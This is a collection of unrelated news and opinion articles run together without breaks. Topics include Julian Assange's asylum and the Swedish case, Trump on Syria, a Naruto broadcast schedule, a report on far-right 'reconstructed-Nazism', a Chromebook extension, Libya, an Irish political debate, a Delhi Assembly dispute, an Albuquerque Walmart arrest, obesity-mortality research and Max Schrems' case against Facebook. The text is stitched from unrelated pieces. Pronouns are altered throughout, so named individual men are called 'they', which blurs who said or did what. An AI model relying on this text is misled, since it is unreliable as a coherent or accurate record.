The Working Group stated that their confinement violates the Universal Declaration of Human Rights and the International Covenant on Civil and Political Rights and amounts to arbitrary detention by Sweden and Britain. Its ruling that Assange should be released and given compensation was rejected by both countries.
The decision by Sweden to question Assange in the embassy after years of dismissing their offers to be interviewed was announced in a statement Thursday by Ecuador's Attorney General Diego García Carrión. They said, “In the coming weeks a date will be established for the proceedings to be held at the embassy of Ecuador in the United Kingdom... For more than four years, the government of Ecuador has offered to cooperate in facilitating the questioning of Julian Assange in the Ecuadorian embassy in London, as well as proposing other political and legal measures, in order to reach a satisfactory solution for all parties involved in the legal case against Julian Assange, to end the unnecessary delays in the process and to ensure full and effective legal protection.
“In line with this position, Ecuador proposed to Sweden the negotiation of an agreement on mutual legal assistance in criminal matters, which was signed last December and which provides the legal framework for the questioning.”
The attorney general said that the questioning did not invalidate the findings of the UN Working Group, insisting, “Ecuador's foreign ministry reiterates its commitment to the asylum granted to Julian Assange in August 2012, and reaffirms that the protection afforded by the Ecuadorian state shall continue while the circumstances persist that led to the granting of asylum, namely fears of political persecution.”
On Friday, Swedish prosecution authority spokesperson Karin Rosander said Ecuador's reply “means that a questioning can make the case go forward. This is decisive to be able to take a decision whether to formally charge them or not.”
Assange's persecution originates in the response of the Obama administration to the publication by WikiLeaks in 2010 of hundreds of thousands of secret documents relating to the wars in Iraq and Afghanistan leaked by Army whistleblower Chelsea Manning, including the infamous “Collateral Murder” video. Pressure was put on US allies, including Sweden, which had been a centre of WikiLeaks operations, to do whatever they could to counteract Assange's activities.
In Sweden, the authorities seized on the occasion earlier in 2010 when two women, who had consenting sexual relationships with Assange, visited a Stockholm police station to request they take an HIV test.
Swedish prosecutors then alleged that Assange, without charging him, had committed a number of sexual misconduct offenses. When Stockholm's chief prosecutor declared there was no evidence of rape, another prosecutor, Marianne Ny, resurrected the case, at the behest of a right-wing Social Democrat, Claes Borgstrom.
In December 2010, Sweden issued a European Arrest Warrant, requesting that the UK, where Assange was living, arrest and extradite him. After two years of court battles, house arrest and several days in jail, Assange, still not charged with any offense, entered the Ecuadorian embassy in June 2012, where they have remained to this day.
Since then, Ny has insisted that Assange had to return to Sweden to be questioned, even though the Swedish authorities have interviewed dozens of people in the UK over the last five years and transferred an entire Stockholm court to Rwanda for war crimes proceedings in 2012.
Following the UN Working Group's ruling, Assange's attorneys asked the Stockholm District Court this February to overturn the EAW. The court refused, claiming Assange's “stay” at the Ecuadorian Embassy was not a form of detention and that “there is still probable cause for the suspicion against [Assange] for rape, less serious incident, and that there is still a risk that they will depart or in some other way evade prosecution or penalty.” Assange's lawyers are appealing the decision.
Five hundred human rights organisations, activists, Nobel laureates and diplomats have condemned the Swedish and British rejection of the UNWGAD ruling in an open letter.
Speaking in a live video feed Saturday from the embassy to an event at the Australian Bendigo Writers Festival, Assange said of Sweden's move, “The situation is this, there is one allegation, there are no charges, there have never been charges. In relation to this precise allegation, I have already been cleared by the chief prosecutor of Stockholm, back in 2010, who found that no crime had been committed whatsoever. It's been at the stage of preliminary investigation ever since.”
Asked by the interviewer, Professor Robert Manne, if they believed they would go free if Sweden stopped their persecution, Assange replied, “I'm 100 percent confident that I would not be a free person because the British government has said, regardless of whether the Swedes drop the case or not, they're going to arrest me. The UK government also refuses to confirm or deny whether there is already a US extradition request.”
Backing up the extent of the intimate relationship between Sweden's political and judicial authorities and successive US governments, Assange told the audience, “The Swedes have extradited every single person that the US has asked for since at least the year 2000. They have a 100 percent extradition rate to the United States. The UK has a 90 percent extradition rate.”
Assange concluded, “We have the United States asserting jurisdiction over an Australian not in the United States, asserting jurisdiction over web servers and publishing operations in Europe and Australia.”
The Sydney Morning Herald, no friend of Assange, was forced to acknowledge that “the packed Ulumbarra Theatre crowd was largely sympathetic [to Assange], delivering rousing applause at various points in the discussion.”
Efforts to railroad Assange are being intensified following WikiLeaks' release of roughly 20,000 internal Democratic National Committee (DNC) emails, exposing the methods that the Democratic Party utilizes in order to raise funds, dole out privileges and cover up their dirty dealings.
Most significantly, the emails revealed how the DNC worked to undermine the campaign of Vermont Senator Bernie Sanders and assist the campaign of Hillary Clinton. Last week WikiLeaks tweeted a reminder that in 2010, Bob Beckel, a strategist for the Democratic Party, called for Julian Assange to be assassinated.
The author also recommends:
WikiLeaks offers $20,000 reward over murder of DNC staffer linked to email leak
[12 August 2016]
Leaked emails show Democratic National Committee targeting Sanders campaign
[25 July 2016]
Please enable JavaScript to view the comments powered by Disqus.
President Trump said Tuesday the U.S. will not launch a full-scale war in Syria, seeking to ease concerns that last week's missile strike could escalate American involvement in that country's civil war.
“We're not going into Syria,” Trump said in an interview with Fox Business Network.
Trump suggested their decision last week to launch 59 cruise missiles at a Syrian air base used in a sarin gas attack was purely intended to curb Syrian leader Bashar Assad's use of chemical weapons against their own people.
ADVERTISEMENT
“But when I see people using horrible, horrible chemical weapons – which they agreed not to use under the Obama administration, but they violated it,” the president said.
“What I did should have been done with the Obama administration long before I did it. And you would have had a much better — I think Syria would be a lot better off right now than it has been.”
The president made no mention of the fact they repeatedly urged Obama against military intervention in Syria as a private citizen. They have previously said the horrific images of the victims of Syria's most recent gas attack was behind their change of heart.
Trump's comments come amid swirling questions about the direction of their strategy on Syria.
Some top officials, including U.S. Ambassador to the United Nations Nikki Haley, have pointed toward an aggressive American effort to remove Assad from power.
Secretary of State Rex Tillerson and others have previously said that the Syrian people will decide Assad's fate, emphasizing that the focus in the country remains on defeating Islamic State in Iraq and Syria (ISIS) militants.
The White House has also ramped up pressure on Russia to abandon its support for the Syrian leader.
Officials on Tuesday accused Moscow of attempting to “cover up” the Syrian government's involvement in the attack, releasing a four-page intelligence report saying the U.S. is “confident” the Assad regime was behind the deadly strike.
The comments came after Russian President Vladimir Putin suggested without offering evidence that the U.S. might stage a fake chemical attack as pretext to launch additional military strikes against Syria.
Jason DeMarco, vice president of strategic marketing and promotions for the paired television networks Cartoon Network and Adult Swim, announced on Thursday that Naruto will run on Adult Swim's Toonami block on Saturday, December 1 at 12:30 a.m. EST/PST (effectively Sunday, December 2 in the morning).
The anime will run uncut, starting from the first episode. DeMarco emphasized that Disney still has the rights to the follow-up series Naruto Shippuden.
The new Toonami weekend schedule will be as follows:
12:00 Bleach
12:30 Naruto
01:00 Tenchi Muyo GXP
01:30 Thundercats
02:00 Samurai 7
02:30 Symbionic Titan
03:00 Eureka 7
03:30 Fullmetal Alchemist Brotherhood
04:00 Cowboy Bebop
04:30 Cowboy Bebop
05:00 Inuyasha
05:30 Inuyasha
Naruto previously ran in Toonami when Toonami was a programming block on Cartoon Network. Both Naruto's Cartoon Network run and Cartoon Network's version of Toonami ended in 2008.
[Via Saiyan Island]
Update: More background information added.
Conclusions and Recommendations: Countering Reconstructed-Nazism
Nafeez Ahmed Blocked Unblock Follow Jun 23, 2016
Return of the Reich: Mapping the Global Resurgence of Far Right Power — an INSURGE intelligence investigative series commissioned by Tell MAMA
The prospective victory of neo-Nazi political parties and ideological narratives in Europe are by no means a foregone conclusion. However, for such a series of victories to be averted will require existing trends in the exponential growth in popularity of these parties to be halted and reversed.
This investigation has not set out to identify wider sociological and economic drivers of the rise of the ‘new' far-right, but has focused on the growing internal cohesion within the movement with respect to its shared neo-Nazi heritage and ideology — along with its tactical efforts to conceal this heritage and ideology in order to consolidate leverage over mainstream public institutions.
To the extent that mainstream institutions have enabled this process to take place, they have become (unwittingly or otherwise) structural accomplices in the emergence of a trans-Atlantic neo-Nazi political movement with considerable influence on mainstream right-wing parties across the Western world. The distinctive character of this trans-Atlantic neo-Nazi movement is precisely its axiomatic public denunciation of the very ideology that animates it at core.
It is for this reason that this ‘new' revamped form of Nazism — cosmetically altered through public relations and internal policing, allowing itself to temporarily ‘bury' its animating ideology for later resurrection when the consolidation of power no longer requires such measures — is not simply ‘neo-Nazism', but something far more insidious.
A more conceptually accurate way of capturing this phenomenon is the idea of reconstructed-Nazism, indicating that the core ideology embraces core Nazi principles, but embeds them in a range of cosmetic narrative adjustments which allow those principles to function subliminally in a new postwar, anti-Nazi and post-9/11 global cosmopolitan context.
This is an unprecedented development in the history of Europe that makes the continent vulnerable to neo-fascist subversion.
This suggests the following ways forward for concerned citizens, public institutions, government policymakers and political parties:
Recommendation 1
Citizens, including especially journalists, must be aware of how legitimate public debates over immigration, multiculturalism and the future of the European Union have been subtly defaced from behind the scenes by political parties and groups belonging to a trans-Atlantic reconstructed-Nazi movement. The questions involved in these debates are widely recognised as bearing critical importance for the future of viable and safe liberal democracies — however, the trans-Atlantic reconstructed-Nazi movement sees these debates as, effectively, ideological ‘Trojan Horses' by which to cement their legitimacy in mainstream public institutions.
Therefore, it is absolutely crucial that citizens reflect critically on the way in which these debates are being exploited by parties and groups affiliated to the reconstructed-Nazi movement to endorse discriminatory and exclusionary policy proposals that threaten the most fundamental values of liberal democracies. This includes the real threat from Islamist terrorism, whose latest incarnation is the ‘Islamic State'.
Reconstructed-Nazism privately welcomes the escalation of Islamist terrorist attacks as a mechanism to convince Western publics of the need for white-supremacist institutions that discriminate against and exclude various types of ‘Other.' While for tactical reasons the current focus of such proposals comprise Muslim communities, in principle the internal dynamics of this movement reveals that Jewish communities alongside numerous other minorities are also at risk.
Recommendation 2
Civil society and media organisations have so far underestimated the extent to which far-right parties such as the British Ukip, the Dutch PVV and the French NF constitute nodes within an emerging trans-Atlantic reconstructed-Nazi movement. This has led to insufficiently critical examination of their Nazi heritage, alliances and inconsistent policies, permitting them to publicly distance themselves from their own core animating pro-Nazi sympathies with a degree of credibility.
Further research and investigative journalism is urgently required to unearth the nature of these political parties, their origins and goals, and their increasing interest in trans-Atlantic tactical coordination.
This information also needs to be widely communicated in order to galvanise an informed public debate on the risk this emerging movement poses to social cohesion and national security.
Recommendation 3
Governments and mainstream political parties have been all too willing to sacrifice their professed principles by forging alliances with far-right parties operating as nodes in the trans-Atlantic reconstructed-Nazi movement. While this strategy may or may not pay off in the short-term in terms of public outreach, the toxifying impact on public discourse and the increasing legitimacy and credibility thus granted to individual nodes (specific national political parties) in the reconstructed-Nazi movement gives, empowers the wider movement's ideological reach.
In the long-run this fatally undermines the mainstream voter support-base of the mainstream parties, paving the way for future far-right political victories at the expense of incumbent parties. Efforts to capture public votes by mainstream parties tactically shifting further to the right will simply backfire increasingly by lending further credence to the reconstructed-Nazi ideology and demonstrating the need for the mainstream to make effective concessions to the far-right simply to survive.
Therefore, governments and mainstream political parties, especially conservative and right-wing parties being courted by the far-right, must pursue countervailing strategies to root out and condemn sympathisers of reconstructed-Nazi extremism in their own ranks. While remaining true to their own political principles, they must communicate to their own members, constituencies and to the wider public that these principles are fundamentally at odds with the animating principles, ideology and values of the trans-Atlantic reconstructed-Nazi movement.
Recommendation 4
There is a particular responsibility for governments to launch public and civil society education programmes to increase citizens' access to critical information on the nature of the far-right and its Nazi heritage. This information should not be ideological in its form, but based purely on peer-reviewed historical data with a view to empower citizens to make informed choices.
This will place some pressure on far-right parties to acknowledge and renounce their own core Nazi heritage amidst transparent organisational, personnel and policy reforms, fundamentally disconnecting themselves from the trans-Atlantic reconstructed-Nazi movement, if they wish to maintain a semblance of legitimacy.
It will also, in any case, rightly delegitimise and discredit them wholesale on the basis of fact.
Governments and their private sector donors need to acknowledge that the increasing appeal of the trans-Atlantic reconstructed-Nazi movement to Western publics through the ‘Trojan Horse' of legitimate issues such as immigration and so on, is ultimately rooted in deeper social and economic crises that remain unresolved.
Those crises fundamentally call into question the efficacy of business-as-usual. Unless governments and their private sector donors adopt a course of radical social and economic transformation which can restore public confidence, while fundamentally rejecting the toxic ‘Trojan Horse' exclusionary discourses used by the reconstructed-Nazi movement to self-legitimise, the extreme right will continue to exploit this malaise by broadening its appeal. This will have dangerous consequences for the West's most cherished institutions and values.
It must be recognised that the biggest threat from the trans-Atlantic reconstructed-Nazi movement is not that of far right terrorism, although this is real enough and increasing — but the prospect of entryism into prevailing institutions of power, in order to permanently deface them under the influence of neo-Nazi ideology.
When you close the lid of your Chromebook it enters sleep mode — but what if you don't want it to?
Chromebooks automatically enter sleep mode when the lid is clammed shut or the device is left doing nothing for around 6 minutes or so (known as the ‘sleep timeout').
Sleep mode is useful. It save battery life by turning off the screen and Wifi and suspends apps and power-supping background processes when they're not needed.
If left in sleep mode for an extended period your Chromebook will shut down fully to conserve even more battery.
When you're ready you can pick up your Chromebook, open the lid, and instantly carry on from where you left off (and with Easy Unlock enabled you don't even have to enter your password, either).
That said, there may be times when you want to disable sleep mode on your Chromebook.
Why Disable Sleep Mode on a Chromebook?
Chrome OS doesn't offer a way to control power settings. You can't override the timeout by plugging in a power cord, either.
But there are instances where you may want to keep your Chromebook from sleeping:
You may want to let a large download complete (while you feed the cat), leave a bunch of of files uploading Google Drive (while you play with the cat) or need to maintain connection to a web server or chat protocol (after the cat commandeers your lap).
Or the tl;dr version:
Downloading a large file(s) while your device is unattended
Uploading a large file(s) to Google Drive, STFP, Dropbox, etc
Keeping a connection to server active
Playing music while your Chromebook idles
Keep Awake for Chrome OS
‘Keep Awake is a caffeine shot for your Chromebook'
Keep Awake is a tiny Chrome extension made by Google that can disable Chromebook sleep mode from kicking in, both if the lid is closed or when the idle sleep timeout is reached.
Think of it as a caffeine shot for your Chromebook.
The extension adds a small button to the Chrome toolbar menu. This button can be clicked to toggle between modes that override the default power settings of Chrome OS:
Sun Icon — Screen kept on and all power management suspended
Sunset Icon —Screen will dim/blank but system won't sleep
Moon Icon —Power management untouched
Keep Awake is obviously not something you should leave enabled all the time (or it'll be bye-bye battery time) but for those occasions where you don't want to lose your internet connection when you step away to see to something else it could come in very handy.
Keep Awake is a free download, is made by Google, requires no permissions and is designed for Chrome OS.
Keep Awake on Chrome Web Store
h/t autechre_fan
In honor of the transparency fights that coder and internet activist Aaron Swartz led while alive, an online record processing service has submitted more than 100 public records requests on behalf of members of the public.
Muckrock, a site that processes public records requests for a fee on behalf of journalists, lawyers, activists and others, decided to waive its fee (generally $20 for five requests) last week and offer to submit federal Freedom of Information Act requests for free to honor Swartz, who committed suicide earlier this month.
The site received 153 requests during the week the offer was open. About 35 of those were Privacy Act requests, submitted by people who wanted to obtain files and records pertaining to themselves that are held by the FBI and other federal agencies. But there were also records requests for documents pertaining to the Tar Sands Blockade, to the controversial Guantanamo Bay prison and to the Occupy protests. With regard to Privacy Act requests, the site didn't submit them, but advised those who wanted to submit them how to do so.
Michael Morisy, Muckrock cofounder, said their group follows up on requests automatically until a response is received and also posts any documents received online - excluding documents obtained through Privacy Act requests or those obtained by journalists who want the documents withheld under embargo until they can write a story about them.
Some people are still convinced that OS X being jailed by default is not a sign of evil intent on Apple's part. So here's some more commentary around the topic.
“If Apple really wanted to restrict all app distribution to the app store, why did they come up with this Gatekeeper system?”
Because right now, there are a lot of applications that can't be placed on the App Store because of Apple's rules, as well as the technical restrictions such as sandboxing. There are even more applications whose authors are not interested in the App Store. I think the App Store has failed to get the critical mass Apple hoped for.
The ‘third way' approach of “Well, you can get a key and sign your code but not actually have to use the App Store” is a way to entice everyone to sign their code with Apple-approved keys. Once all the major developers go along with that, the “Turn off Gatekeeper” option can be removed from OS X without 99% of users ever noticing.
At that point, Apple has complete control. They can set the terms for what software is allowed on the Mac, and yank apps even if they aren't from the App Store. If they don't want DVD rippers or emulators available, they just revoke the appropriate developer signing keys. And they can rent you developer access to your own hardware, like they do with the iPad and iPhone.
“You're paranoid. Apple would never do that.”
If you don't think Apple would ever do all these things, I have to ask: Why wouldn't they? It would give them complete control over the platform, and the iPhone and iPad have apparently demonstrated that there would be no impact on sales from doing so. Even big names like Adobe and Microsoft have gone along with the iPad's restrictions.
Compulsory signing would also eliminate the ability to run cracked pirated versions of applications. Developers would love that—and so would Apple, since they could start demanding a 30% cut.
You can see more of this cat-herding going on if you look at the new features in Lion and Mountain Lion. iCloud is only available to applications in the Mac App Store. The new notification center is the same. There's really no technical reason for such restrictions; it's just Apple using new functionality as a carrot to get everyone onto the App Store where they can be controlled.
“It's just being done for the sake of security.”
You could just about make the argument that iSync needed to be limited for security reasons, but there's no such excuse for apparent limitations on notification center access. To me, this is the smoking gun that shows Apple's intent.
If Apple were really concerned with security, they'd be updating the out-of-date GPL software that ships with OS X to current versions that have had the security holes patched. But instead, they are purging all the GPL v3 licensed software.
The two big features of GPL v3 are disallowing use of patent lawsuits to prevent people using the code you distribute, and preventing locking down hardware so you can't run modified code. The idea that Apple wants to be able to sue people who run GCC or the bash shell is possible, but it seems unlikely to me. Similarly, wanting to share code between iOS and OS X doesn't really explain why they won't distribute things like the bash shell and GCC which only exist in OS X. So that leaves locking down OS X as the most plausible motivation.
If Gatekeeper is all about security and not about control, why don't Apple offer the same options as Gatekeeper on the iPad and/or iPhone? If Apple does that, I'll admit I'm being paranoid and shut up about this. (And buy an iPad.) Since I submitted a request for a developer option to turn off the jail when the iPhone was launched, I'm not holding my breath.
On the contrary, unless Apple reverses their current course and opens up the new OS X functionality to all applications and not just jailed ones they get a 30% cut from, my current Mac will be my last.
As the war in Libya continues, observers are foreseeing protracted, bloody conflict with considerable loss of life. While the rebel forces appear strongly supported in the Eastern part of the country, the Gadaffi regime seems to have support in the Western portion. There is also a mounting refugee crisis as Libyan citizens and many non-Libyan workers in the country's oil and gas industry are fleeing for their lives.
The two European NATO countries which have spearheaded the intervention in Libya, the United Kingdom and France, are calling for an intensification of the intervention.
A stalemate and a continuing civil war are not in the interests of the people of Libya. Therefore we should pay serious attention to attempts at mediation and a cease-fire.
From the beginning, a number of countries and blocs have called for precisely this. These include the ALBA (Bolivarian Alliance for the People of Our America) group of Latin American and Caribbean states, and also Brazil, Indonesia and Vietnam.
The African Union (AU), after being blocked by NATO bombing for a while, was able to get a delegation composed of the presidents of South Africa, Mauritania, Mali and the Republic of the Congo (Brazzaville) and the foreign minister of Uganda into Libya last weekend.
Our corporate-controlled press immediately belittled this delegation, pointing out that many of the African Union countries are not exactly paragons of democracy, and that the African Union and several of its component countries are deeply beholden to Gadaffi for economic support. However, the strongest figure in the delegation is South African President Jacob Zuma, whose government voted for the UN resolution enabling the no-fly zone, and has clashed with Gadaffi on other issues. So to represent the AU delegation as mere Gadaffi puppets is not correct.
The government in Tripoli reacted positively to the AU initiative but the rebel leadership in Benghazi on Monday rejected it because it does not call for the immediate removal of Gadaffi, their sons and their close associates.
Now the five countries called the “BRICS” (Brazil, Russia, India, China and South Africa), meeting in China, have come out in favor of a negotiated, peaceful settlement in Libya.
The total population of the BRICS countries and others who have stepped in to call for a cease-fire and negotiations amounts to nearly half of the population of the planet. The BRICS countries are also a rising force in the world, economically and diplomatically.
Imperialist leaders have taken the position that NATO (North Atlantic Treaty Organization) as an “international organization” gives legitimacy to whatever they do in Libya. Nothing could be further from the truth. NATO is not an “international organization.” It was founded after the Second World War as an anti-communist military alliance. Under this cover, NATO, with its Operation Gladio “stay behind” organizations, has a sinister history of intervening in the internal affairs of European countries. This includes organizing terrorism in Italy (killing scores of innocent people) so as to be able to blame it on communists, and supporting the vicious dictatorship of the colonels in Greece from 1967 to 1974. Since the collapse of Soviet and Eastern European socialism, NATO has greatly expanded its role, intervening in the civil wars in the former Yugoslavia and now operating in Afghanistan. At its meeting in Lisbon, Portugal, late last year, NATO made it clear that the “North Atlantic” for its purposes now includes just about the whole planet.
The United States is still the strongest state within NATO, but the leaders of other major NATO countries have their own imperialist agendas, which are becoming very visible as France and Britain push for escalation of the Libya war. Back in the 1960s, France (under de Gaulle) pulled out of the NATO command structure, partly because of the perception that it was dominated by the U.S. and Britain, but also because NATO at that time refused to help with France's troubles in Algeria. In 2008, the current French president, Nicolas Sarkozy, re-inserted the French armed forces into the NATO command structure. This coincides with increased French interventionism, from West Africa to Haiti. Could it be that Sarkozy now sees NATO as a useful mechanism for advancing the interests of French imperialism?
The interests of the NATO governments are those of their own ruling classes, not of the Libyan people. These ruling class interests include control over Libya's oil, gas and underground water resources, as well as geopolitical influence in an important area of the world which appears to be slipping out of imperialism's grasp.
Therefore progressive people in the United States should support any efforts of third parties to promote a peaceful solution to the growing Libya stalemate.
Sinn Féin's plans to abolish water charges and the property tax would cost the Irish taxpayer € 1.3 billion according to Labour Party leader Joan Burton.
Speaking during a debate on RTÉ's Claire Byrne Live, the Tánaiste accused Sinn Féin leader Gerry Adams of jeopardising Ireland's tentative economic recovery with irresponsible fiscal policies, while Mr Adams claimed their political adversary had crumbled under pressure from coalition partners Fine Gael over core issues of policy.
“Sinn Féin's plan on water charges would cost an extra € 800 million, and Sinn Féin's plan to abolish the property tax would cost €500 million. These are fantasy figures on the leader's part, they're amazing figures; they're simply not correct. If they think about it, they know they're not correct,” they said.
During the course of a wide-ranging debate encompassing budgets, European debt write-down and party posturing over alliances ahead of 2016's expected General Election, Ms Burton maintained that their party had been successful in defending social welfare benefits, a point which Mr Adams vehemently denied.
“You promised the electorate you would not cut carers' allowances; you cut carers' allowances,” said the TD for Louth.
“You promised the electorate you would not cut child benefit, you promised the Irish electorate it would be Labour's way or Frankfurt's way. You didn't stand up for Irish interests in Europe, ” they added.
While pedestrian at times, the argument threatened to combust at certain junctures as the opposing factions launched into scathing personal attacks, such as Ms Burton's forthright appraisal of views expressed by senior members of Sinn Féin in relation to the economy and taxation.
“You told a lie, and you're actually not telling the truth when you're talking there now about the Irish economy, about employment in the Irish economy, or about the tax system,” they said, commenting on the opposition party's alternative pre-budget submissions.
They added: “You think badly of everything to do with the Republic, we're actually proud of the Republic, you're not- we know that.”
“You've reduced yourself to personal invective and personal attacks, and you've accused me of telling lies,” Mr Adams replied, before both combatants indulged in an unseemly quote-off involving speeches made by pre-eminent labour movement leader James Connolly.
Ms Burton said a recent report from the Central Statistics Office illustrated the small steps being made by the average Irish family as the middle classes seek a return to pre-crisis prosperity.
“For the first time in a long time, the actual income of people in the middle range has gone up, and for the first time in a very long time, the actual figures in relation to poverty have gone down very, very slightly.
“The median income of families in Ireland has just gone up for the first time in a very long period of time by about € 300 to € 400 a year. They are all significant achievements along with the extra 80,000 people back at work,” they said.
In their response, former MP Adams urged the State's governing parties to add to calls for a European conference aimed at writing down debts accrued by countries such as Ireland and Greece during the recession.
“This is a Government that told us we were going to get retrospective recapitalisation of our banks- we haven't even asked for it.
“The big problem we have is the debt. That's a European problem, of course we should be working with the people of Greece and working with others to make sure a new European Union comes out of all of this,” they said.
Delhi Assembly on Wednesday witnessed unprecedented din as ruling AAP MLAs termed deceased VHP leader Ashok Singhal a "terrorist".
While Speaker Ram Niwas Goel denied permission for paying tributes to Singhal, AAP MLAs created an uproar saying they were responsible for killing of thousands of people post the demolition of Babri Mosque in 1992. Opposition Leader Vijender Gupta had sought an obituary to the VHP leader.
ALSO READ - The life and times of VHP leader Ashok Singhal
"He (Singhal) was not a member of this House nor was they any Parliamentarian. The House is aggrieved over their demise but the Assembly cannot allow tributes here," said Goel. A number of AAP leaders said Singhal was a 'terrorist' who perpetrated the Babri mosque demolition. The BJP leaders retaliated saying the proceedings of Delhi Assembly were the biggest example of intolerance, where the ruling party was not ready to listen to the Opposition.
Amidst country-wide debates on intolerance and growing communal tension, the Delhi Legislative Assembly too raised the topic for discussion with Delhi MLAs condemning the recent incidents like Dadri, Manipur and Jammu and Kashmir. AAP MLA Mahendra Yadav said India had become at par with countries like Iraq, Syria, Pakistan and Afghanistan.
ALSO READ - VHP stalwart Ashok Singhal dies at 89
The members requested the people to maintain peace and solidarity. "India is surrounded by a number of failed nation states, yet we continue to remain strong. The reason behind this unmatched solidarity is our peaceful attitude and we should continue to maintain that," Jarnail Singh, MLA from Rajouri Garden said.
The members, however, lashed out against political parties. Without naming anyone, Laxmi Nagar MLA Nitin Tyagi claimed that certain parties are responsible for the communal tension and are using it to rake-in the divided vote bank. "Nationalism in the country is being defined by radicals. Intolerance is when the country's intellectuals return awards and when our nationally acclaimed actors are asked to move out of their own country," said Tyagi adding "I appeal people to live and let live."
Delhi government's Water and Tourism minister, Kapil Mishra also took a jibe at the Delhi Police for its raid at the Kerala House House and alleged that intolerance is not a country-wide thought.
Bizarre intrusion shuts down Albuquerque shopping center Copyright by KRQE - All rights reserved Video
ALBUQUERQUE, N.M. (KRQE) - Albuquerque Police have reopened the area of San Mateo and Cutler, which is by the Pavilions shopping center at San Mateo. The area was shut down due to police responding to a man found hiding out in a Walmart overnight.
Police say George Suckow went into the Walmart bathroom before they closed and hid out until the employees left.
They say they were then spotted on security footage, eating chocolate and drinking soda.
They then opened a package of adult diapers and put them on.
Police say they made their way to the baby aisle where they removed more diapers from twelve packages and took out a binky and a bottle.
Suckow triggered an alarm. Police say a K-9 unit found them in a bathroom and they were arrested.
Police say Suckow caused more than $150 in damage.
The scene also caused the Old Navy in the area to delay their opening.
Saturday, Suckow was relatively chatty and animated as they appeared before a judge for their case.
Judge Sharon Walton released Suckow on their own recognizance with pre-trial supervision.
----
This month's issue of Mayo Clinic Proceedings features two new articles on the obesity paradox—the finding that overweight/obesity confers a survival advantage in individuals that have been diagnosed with a medical condition. These paradoxical findings have also been found in the general population. Indeed, the largest meta-analysis to date on weight and mortality in the general population summarized 97 studies consisting of close to 3 million observations and found that being overweight is associated with lower mortality relative to normal weight and that being slightly obese confers no excess risks.
The latest meta-analysis investigates the relationship of body mass index (BMI) with total mortality, cardiovascular (CV) mortality and myocardial infarction (MI) after coronary revascularization procedures. Across 36 studies, it finds that the risk of total mortality, CV mortality and MI was highest among underweight patients, and CV mortality was lowest among overweight patients.
The second study examines BMI and attributes of body composition [lean mass index (LMI) and body fat (BF)] in a population of patients referred for echocardiography. Once again, the authors find that higher BMI is associated with lower mortality. But when they separate the attributes of body composition, they find that a higher lean mass index (i.e., muscle) eliminates the protective effect of higher body fat, and is itself associated with lower mortality in both obese and non-obese people.
Reverse causality
These studies seem to confirm the obesity paradox. But do these findings reflect true causal effects of obesity on mortality or confounding? Some scholars suggest that excess weight may help protect against frailty and wasting diseases. On the other hand, skeptics argue that confounding masks the true causal relationship between weight and mortality. A key culprit cited is reverse causality, which refers to the fact that an individual's weight may be a reflection of illness. Are we mixing up cause and effect?
I have recently published work that attempts to address reverse causality and to explain why findings of weak or inverse associations between excess weight and mortality are so prevalent in the literature. My approach uses lifetime maximum weight to determine an individual's weight before any potential onset of illness. Use of maximum weight makes it possible to identify normal weight people who have always belonged to the normal weight category versus those who were formerly overweight or obese and subsequently lost weight. Previous studies have not been able (or even attempted) to disentangle these two groups; however, this turns out to be quite consequential to understanding the obesity paradox.
Using data from the National Health and Nutrition Examination Surveys, I compared associations between excess weight and mortality using BMI at survey and BMI at lifetime maximum. I studied US adults ages 50-84 who never smoked (since smoking is a strong confounder of the relationship between excess weight and mortality) and used multivariate regression models that adjust for confounding by social and demographic factors.
As shown below, using max BMI strengthens the associations between excess weight and mortality. Excess risk associated with overweight relative to the normal weight category is -2% using BMI at survey compared to 28% using max BMI; excess risk for obese class 1 is 18% vs. 67%; and excess risk for obese class 2 is 31% vs. 115%. The associations are statistically significant for obese class 1 and obese class 2 using maximum BMI, whereas in the case of BMI at survey, none of the associations are significant.
Using maximum BMI strengthens these associations for two reasons. First, when using BMI at time of survey, the normal weight category is a mix of low-risk stable weight individuals and high-risk individuals who have experienced weight loss. These groups have very different mortality rates, as shown below. Specifically, the overall mortality rate in the normal weight at survey group of 10.4 deaths per 1,000 person-years is the weighted average of the mortality rate for the stable normal-weight group (7.2) and the much higher mortality rates of those formerly overweight, obese class 1 or obese class 2 (14.2, 16.5 and 66.6, respectively). In contrast, using max BMI, the normal weight category only includes individuals who were consistently normal weight throughout their lives.
A second reason the associations strengthen using maximum BMI is that the overweight and obese groups contain not only the relatively healthy stable-overweight (or stable-obese) individuals but also the higher-risk individuals who experienced weight loss, making the relative comparisons more pronounced.
These findings suggest that reverse causality is a fundamental source of bias in studies of the mortality risks of obesity. As a result of this bias, many studies in the literature find weak or even inverse associations between excess weight and mortality. The extent of the problem depends on the particular subpopulation being investigated—the bias is expected to be largest in studies focused on the elderly and clinical populations. Not surprisingly, these are the subpopulations in which the obesity paradox is most commonly reported.
Identifying the optimal weight category for mortality risk is important for shaping clinical and public health guidelines. Many studies find that being overweight or moderately obese may not be deleterious to health. But if the tenuous and inverse associations identified in the prior literature are a result of bias—and my analysis suggests they are—then we are at risk of misinforming both patients and the public about what they can do to improve to their chances of living long and healthy lives.
An attempt to bring a class action suit against Facebook for alleged privacy violations has reached the Austrian Supreme Court. This follows a decision by the Vienna Court of Appeals that the plaintiff, the Austrian privacy activist Max Schrems, could file their own claim in the local court, even though Facebook's international headquarters are in Ireland. However, the same court also ruled that similar claims by other Facebook users cannot be combined into a class action.
The Austrian Supreme Court is being asked by Facebook to dismiss the entire lawsuit, while Schrems hopes to be given permission to start a class action by combining their "model case" with those of others.
As Schrems says on their site: "It would not make a lot of sense for the court or the parties before it to file these claims as thousands of individual lawsuits—which we can still do if a ‘class action' is not allowed. We therefore think that the ‘class action' is not only legal but also the only reasonable way to deal with thousands of identical privacy violations by Facebook."
The Austrian Supreme Court could decide directly whether to allow the class action, or it might refer the case to the Court of Justice of the European Union (CJEU), because of the important issues involved. The Supreme Court is expected to hand down its judgement early next year, and will not require any hearings. Once the admissibility of a class action has been decided, the case will go to the Vienna Regional Court, which will then set a date for the first hearing on the matter.
The current action in Austria has been running in parallel with Schrems' other legal battle, which was against Facebook's use of the Safe Harbour framework. Schrems won that case in a dramatic fashion at the CJEU last month.
Meanwhile, Facebook has a separate but equally serious problem in Belgium, where it was ordered to stop tracking Internet users who do not have a Facebook account within 48 hours, or face fines of €250,000 per day. However, according to an interview in the Belgian newspaper Le Soir, there is a legal procedure that Facebook can use to appeal against that ruling while stopping the clock on the fines. The fact that we have heard nothing more about the order suggests Facebook has taken this or a similar route to put things on hold.
